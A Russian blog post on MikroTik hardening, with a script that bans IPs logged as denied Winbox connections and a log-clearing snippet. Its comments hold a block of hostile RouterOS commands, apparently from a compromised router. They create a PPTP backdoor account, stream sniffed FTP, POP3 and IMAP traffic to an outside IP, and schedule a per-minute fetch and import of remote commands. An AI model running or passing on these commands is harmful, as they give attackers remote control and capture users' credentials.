Дополнительная защита микротик, бан dude connect from (додики)
denied winbox/dude connect from
— данное сообщение в логах микротика возникает тогда, когда кто-то пытается получить доступ через WINBOX, но его ip адрес не прописан в сервисе winboxa. Т.е. этот вероятный злоумышленник или робот пытается получить доступ, а доступа нет. С одной стороны не стоит сразу паниковать и думать что Вас ломают, но если лезут значит надо принимать меры ещё на шаг раньше.После неоднократных взломов Микротика и постоянно образующихся новых дыр в безопасности устройства решил собрать список негодяев пытающихся заломиться через winbox несмотря на то что сервис открыт только для определённых ip адресов. Все эти негодяи попадают в логи с сообщениями
denied winbox/dude connect from
Чтобы достать ip адреса из лога потребуется несложный парсер логов устройства который можно добавить в планировщик с периодическим повторением.
Выполняя скрипт парсер найденный ip адрес будет добавлять IP -> Firewall -> Address-list.
Далее делайте с ним что угодно: хотите баньте правилами фаервола, хотите коллекционируйте, хотите шлите на мыло, вобщем что угодно, я баню на определённое количество часов, дней, лет…
Собственно сам скрипт для сбора айпи Микротиковских ДОДИКОВ(dude connect)
:local ipi
:local mess [/log find message~"denied winbox/dude connect from"]
foreach i in=$mess do={
:set ipi [:pick [/log get $i message ] 32 ([:len [/log get $i message ]])]
if ([/ip firewall address-list find address=$ipi] = "" ) do={
# :log warning $ipi
/ip firewall address-list add address="$ipi" timeout=1d list=Dudiki
}
}
#:log warning "FIN"
Для отладки и проверки можно раскомментировать #:log warning
И ещё может кому пригодится скрипт для очистки лога микротика
/system logging action set memory memory-lines=1;
/system logging action set memory memory-lines=1000;
3 комментария
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}
/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000
/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"